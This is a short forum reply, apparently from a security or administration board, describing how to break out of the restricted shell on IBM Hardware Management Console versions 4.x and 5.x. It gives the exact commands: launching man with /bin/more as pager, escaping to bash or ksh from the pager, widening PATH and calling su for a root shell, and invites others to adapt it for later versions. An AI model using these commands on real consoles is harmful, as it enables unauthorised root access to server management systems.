Re: HMC Unrestricted Root Access | | Hey,
There's easier method by using simple 'man', it works on 4.x and 5.x, but seems to not work on 6.x and 7.x versions, maybe someone can play around:
$ man -P /bin/more chhwres // get 'more' as module instead of restricted 'less'
!/bin/bash // run root shell from man (HMC v4)
!ksh // run root shell from man (HMC v5)
$ export PATH=$PATH:/bin:/usr/bin
$ su - |